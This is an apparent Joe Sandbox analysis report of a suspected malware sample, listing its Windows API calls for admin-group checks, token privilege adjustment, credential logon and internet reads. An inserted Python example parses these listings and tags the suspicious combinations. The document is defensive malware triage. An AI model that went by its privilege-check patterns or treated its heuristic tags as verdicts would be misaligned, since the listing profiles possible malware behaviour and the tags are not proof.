                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003D2418
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: a663d6027011f42f1a578301dcbf57010165015cf15a466dd1972cd615361429
                                                            • Instruction ID: 35df0148ad072df9f91b482bbe9a68da421672256eabe901960767c8332e9e48
                                                            • Opcode Fuzzy Hash: a663d6027011f42f1a578301dcbf57010165015cf15a466dd1972cd615361429
                                                            • Instruction Fuzzy Hash: 7341F776904309BFEB22DE96EC81EBB77BCEB50314F10406BFA01A6740DA759E419650
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 003CB343
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003CB39D
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003CB3EA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1682464887-0
                                                            • Opcode ID: d4b7c6f56c3e75af211058d738ca86988f3eb6f45e0a45852470c9896986754e
                                                            • Instruction ID: d86032159247edca225688d0f8bb485f5316250ba191b69ad1f3c75757916066
                                                            • Opcode Fuzzy Hash: d4b7c6f56c3e75af211058d738ca86988f3eb6f45e0a45852470c9896986754e
                                                            • Instruction Fuzzy Hash: 5D215C75A00508EFCB01EFA5D881EEDBBB8FF49314F1481AAE905EB355CB31A915CB51
                                                            APIs
                                                              • Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
                                                              • Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003B882B
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003B8858
                                                            • GetLastError.KERNEL32 ref: 003B8865
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1922334811-0
                                                            • Opcode ID: 9e28169e6aecbad3917544a60dd003f17d6e32d43ea8959acfaa3444a8869d78
                                                            • Instruction ID: aa242cb84a11beee5b9da12d53a59a0890bd94cfdc77ddc9cbf908fc5450c5ee
                                                            • Opcode Fuzzy Hash: 9e28169e6aecbad3917544a60dd003f17d6e32d43ea8959acfaa3444a8869d78
                                                            • Instruction Fuzzy Hash: 70119DB2414304AFE729EFA4DC85D6BB7ADFB44314B20852EF45587651EA70BC04CB60
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003B8774
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003B878B
                                                            • FreeSid.ADVAPI32(?), ref: 003B879B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 6fb0085660597593d6cc54980098a3eb455b1decca8d21d9dbecc21f76d33a66
                                                            • Instruction ID: 43e82a9e57bd10509ad5eb88169c3c80034b4643170712c07251b09a700baa2a
                                                            • Opcode Fuzzy Hash: 6fb0085660597593d6cc54980098a3eb455b1decca8d21d9dbecc21f76d33a66
                                                            • Instruction Fuzzy Hash: CAF04975A1130CBFDF10DFF4DC89ABEBBBCEF08311F1045A9AA01E6581E6716A048B50
                                                            APIs
                                                            • __time64.LIBCMT ref: 003C889B
                                                              • Part of subcall function 0038520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003C8F6E,00000000,?,?,?,?,003C911F,00000000,?), ref: 00385213
                                                              • Part of subcall function 0038520A: __aulldiv.LIBCMT ref: 00385233
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                            • String ID: 0eB
                                                            • API String ID: 2893107130-1534231516
                                                            • Opcode ID: 4bcfaa03c87d9f14309691819c12892384edc3a2f11ca1f504f40666854174ba
                                                            • Instruction ID: 4c0d334efea22ed266afc9c90f27bbaa2a661a5d41be218dc8cfca723f0b0471
                                                            • Opcode Fuzzy Hash: 4bcfaa03c87d9f14309691819c12892384edc3a2f11ca1f504f40666854174ba
                                                            • Instruction Fuzzy Hash: 7C21A2326256108BC729CF29D841B52B3E1EFA5311BA98E6CD0F5CB2C0CA74AD45CB54
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 003CC6FB
                                                            • FindClose.KERNEL32(00000000), ref: 003CC72B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: f852ac380d2bfc4b9ce01337c29451fae6412b27b5048ef2eeffd281f48710ce
                                                            • Instruction ID: e215cead3bd065fbeff468ef97beb8ba34ad8b0851e6bebd4cce988423287fd1
                                                            • Opcode Fuzzy Hash: f852ac380d2bfc4b9ce01337c29451fae6412b27b5048ef2eeffd281f48710ce
                                                            • Instruction Fuzzy Hash: 6D1182756002009FDB11DF29C885A2AF7E8EF45324F00C51EF9A9CB291DB70AC05CB81
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,003D9468,?,003EFB84,?), ref: 003CA097
                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,003D9468,?,003EFB84,?), ref: 003CA0A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: ecdc7a938d0fab39ae0fa67aebdc5878cd473e4eb0e1d40cf9a0db8ac3b5336e
                                                            • Instruction ID: e9a39894c74f4f97762ad0a8630637fdbee9bff6b6a32aa8c6f5100b65ea71bc
                                                            • Opcode Fuzzy Hash: ecdc7a938d0fab39ae0fa67aebdc5878cd473e4eb0e1d40cf9a0db8ac3b5336e
                                                            • Instruction Fuzzy Hash: 0AF0823510522DABDB229FA4CC88FEA776CFF08361F008269F909DA181D7709D44CBA1
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003B8309), ref: 003B81E0
                                                            • CloseHandle.KERNEL32(?,?,003B8309), ref: 003B81F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: ffdc784d408301466d005f9b05915b9f7f7d821b103906d10ed65f3fccdfd6c7
                                                            • Instruction ID: d2f7ec27bc2ffa5e26c1be9fe06fc5de097a51c7feded5c05e2df67ac8001b00
                                                            • Opcode Fuzzy Hash: ffdc784d408301466d005f9b05915b9f7f7d821b103906d10ed65f3fccdfd6c7
                                                            • Instruction Fuzzy Hash: 36E0E671011610AFE7672B74EC05D7777EDEF04315B14896DF55588470DB616C91DB10
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00388D57,?,?,?,00000001), ref: 0038A15A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0038A163
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 8723645a10973f231d96ef33a92cbcdda9447381201735653944b5600148869a
                                                            • Instruction ID: 9fc0a2891c899cf2d6d1949a25d3538415185ed22bc6b4ace57dc8f43b9fc39c
                                                            • Opcode Fuzzy Hash: 8723645a10973f231d96ef33a92cbcdda9447381201735653944b5600148869a
                                                            • Instruction Fuzzy Hash: 1BB09235054248AFCA122B91EC49B883F6CEB44BA2F404120F60D886A4CBA255508A91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2199619d16f740ab76fb638b3abcf49d51b0caa7720228d85a1b1a6fa612c310
                                                            • Instruction ID: 94cea69ebca3a010be17762b1c97f01544c36b5a603f033e90a408803e654f7f
                                                            • Opcode Fuzzy Hash: 2199619d16f740ab76fb638b3abcf49d51b0caa7720228d85a1b1a6fa612c310
                                                            • Instruction Fuzzy Hash: 1D32F521D29F414DD723A634D832336A64DAFB73D4F15D777F81AB5AA5EB29C8838200
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: decd6550ab92198d31e0cbbcb3af51534fdacd6af618eec7309e553489792ad1
                                                            • Instruction ID: ca469b3330785ddba35e45bb9ffc5ad33f3aa83c9f95127ef46de4e3ccd8f1c9
                                                            • Opcode Fuzzy Hash: decd6550ab92198d31e0cbbcb3af51534fdacd6af618eec7309e553489792ad1
                                                            • Instruction Fuzzy Hash: BDB10260D2AF414DD72396398871336BB5CAFBB2C5F52D71BFC2A74E22EB2185838141
                                                            APIs
                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003C4C4A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID:
                                                            • API String ID: 2434400541-0
                                                            • Opcode ID: e0ea61ca6fde625e67a3e8a7ec91b9c5fd0c1c7c06a263481fa13fa00471ec24
                                                            • Instruction ID: 0869fbb83f2e72c7301d3662373f34a0accd2865aaffd6d7fb0f6bf38823d6e8
                                                            • Opcode Fuzzy Hash: e0ea61ca6fde625e67a3e8a7ec91b9c5fd0c1c7c06a263481fa13fa00471ec24
                                                            • Instruction Fuzzy Hash: F6D05E9116520938ED2E0720AE7FFBA010CE300782FD1E24D7102CA0E1ECC09C405330
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003B8389), ref: 003B87D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: 03347e4bede9531efaf88cc6c81895b00b487ef9b566c0ed51be88aa4e7d57fe
                                                            • Instruction ID: 541b6b2f24b8e14358d83f7396721b263442b47654fd56005efedeff33904bad
                                                            • Opcode Fuzzy Hash: 03347e4bede9531efaf88cc6c81895b00b487ef9b566c0ed51be88aa4e7d57fe
                                                            • Instruction Fuzzy Hash: 2ED05E3226050EAFEF118EA4DC01EBE3B69EB04B01F408111FE15C50A1C7B5D835AB60
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0038A12A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: b073c756e92ecc296baa838702e8edc59671edab1e8e67f3e0e1b0f5f52250be
                                                            • Instruction ID: bf7c1880107007591ae2039c9e61e98cffcde5d1b02fee211000810603d6b043
                                                            • Opcode Fuzzy Hash: b073c756e92ecc296baa838702e8edc59671edab1e8e67f3e0e1b0f5f52250be
                                                            • Instruction Fuzzy Hash: 1BA0113000020CAB8A022B82EC08888BFACEA002A0B008020F80C882228BB2A8208A80
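                                                             The "APIs" lines of the entries above (the AllocateAndInitializeSid / CheckTokenMembership / FreeSid triple, AdjustTokenPrivileges, LogonUserW, SetUnhandledExceptionFilter and mouse_event) are the part of a function listing an analyst actually reads. What follows is an added example, not code from the Joe Sandbox report or its IDA plugin: a small Python parser for this listing's API lines that recovers API name, module, call-site address and argument list (the plugin prints `?` for values it could not resolve), groups calls under each "APIs" heading, and tags the combinations seen in the entries above. The sample excerpt is copied from those entries; the tag names, the per-heading grouping and the idea of keying on the SID sub-authorities are my own assumptions about how to read the format, not something the report defines.

```python
"""Parse Joe Sandbox "APIs" lines from a function listing and tag combinations
worth a closer look. Added example; not part of Joe Sandbox or its IDA plugin."""
from __future__ import annotations

import re
from typing import Optional

# One API line looks like "• Name.MODULE(arg,arg,...), ref: ADDR"; CRT helpers such
# as "__time64.LIBCMT ref: ADDR" have no argument list, and nested calls carry a
# "Part of subcall function ADDR:" prefix. All three forms are handled here.
_API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def _arg(tok: str) -> Optional[int]:
    """Hex argument as int; "?" (unresolved by the plugin) becomes None."""
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)


def parse_api_line(line: str) -> Optional[dict]:
    """Return a call record for an API line, or None for any other line."""
    m = _API_RE.match(line)
    if not m:
        return None
    args = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("mod"),
        "args": [] if args is None else [_arg(a) for a in args.split(",")],
        "ref": int(m.group("ref"), 16),
        "subcall_of": int(m.group("caller"), 16) if m.group("caller") else None,
    }


def parse_listing(text: str) -> list[list[dict]]:
    """Split an excerpt into per-function call lists, one per "APIs" heading."""
    blocks: list[list[dict]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append([])
            continue
        call = parse_api_line(line)
        if call is not None:
            if not blocks:
                blocks.append([])
            blocks[-1].append(call)
    return blocks


# Sub-authorities that build S-1-5-32-544, BUILTIN\Administrators.
SECURITY_BUILTIN_DOMAIN_RID = 0x20
DOMAIN_ALIAS_RID_ADMINS = 0x220


def tag_calls(calls: list[dict]) -> set[str]:
    """Tag a function's call list. Tag names are this example's own vocabulary."""
    names = {c["api"] for c in calls}
    tags: set[str] = set()
    for c in calls:
        # AllocateAndInitializeSid(auth, nSubAuthorityCount=2, 0x20, 0x220, ...)
        # followed by CheckTokenMembership is the usual "am I an admin?" probe.
        if (c["api"] == "AllocateAndInitializeSid" and len(c["args"]) >= 4
                and c["args"][1] == 2
                and c["args"][2] == SECURITY_BUILTIN_DOMAIN_RID
                and c["args"][3] == DOMAIN_ALIAS_RID_ADMINS
                and "CheckTokenMembership" in names):
            tags.add("admin-membership-check")
    if "AdjustTokenPrivileges" in names:
        tags.add("token-privilege-change")
    if names & {"LogonUserW", "LogonUserA"}:
        tags.add("logon-with-credentials")
    if "SetUnhandledExceptionFilter" in names:
        tags.add("unhandled-exception-filter")
    if "mouse_event" in names:
        tags.add("synthetic-input")
    return tags


def triage(text: str) -> list[dict]:
    """Per function: the API names in listing order and the sorted tags."""
    return [{"calls": [c["api"] for c in b], "tags": sorted(tag_calls(b))}
            for b in parse_listing(text)]


# Constructed excerpt: API lines copied from the report entries above.
SAMPLE = """\
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003B8774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003B878B
• FreeSid.ADVAPI32(?), ref: 003B879B
Memory Dump Source
APIs
• __time64.LIBCMT ref: 003C889B
  • Part of subcall function 0038520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003C8F6E,00000000,?,?,?,?,003C911F,00000000,?), ref: 00385213
  • Part of subcall function 0038520A: __aulldiv.LIBCMT ref: 00385233
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003B8309), ref: 003B81E0
• CloseHandle.KERNEL32(?,?,003B8309), ref: 003B81F2
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003B8389), ref: 003B87D1
"""

if __name__ == "__main__":
    for entry in triage(SAMPLE):
        print(", ".join(entry["calls"]), "->", entry["tags"] or "-")
```

                                                             The sub-authority pair 0x20 / 0x220 with a count of 2 is the standard recipe for S-1-5-32-544, so the first tag is a near-certain reading of that function; the other tags only record that the API is present. A caveat for triage: these same call patterns are built into generic runtimes (AutoIt's IsAdmin() and RunAs() built-ins use CheckTokenMembership and LogonUser respectively), so a tag points at a function to read, not at a verdict on the sample.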
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8ecb3b411864700896b0c08094adabfcea3f5def49b58808b2743885ca84ad28
                                                            • Instruction ID: 65c18eceeb6d7a82d877eee3cc1ca41ffa57d7473ae4fae47cbd75890446dc5a
                                                            • Opcode Fuzzy Hash: 8ecb3b411864700896b0c08094adabfcea3f5def49b58808b2743885ca84ad28
                                                            • Instruction Fuzzy Hash: 06222830A48546CBDF3B8B18C4987BC77A1FB41308F26C46AD64A8BD92DB78DD92C741
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction ID: 5242e599189f461e1a6de7c7a2e7a608dfcf9580c15bc5c6be906cf5e35a9e6a
                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction Fuzzy Hash: 73C184362052930ADB6F663A843413FFAA55EA27B131B47DDD8B3CB1D4EE10C969D720
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                             • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
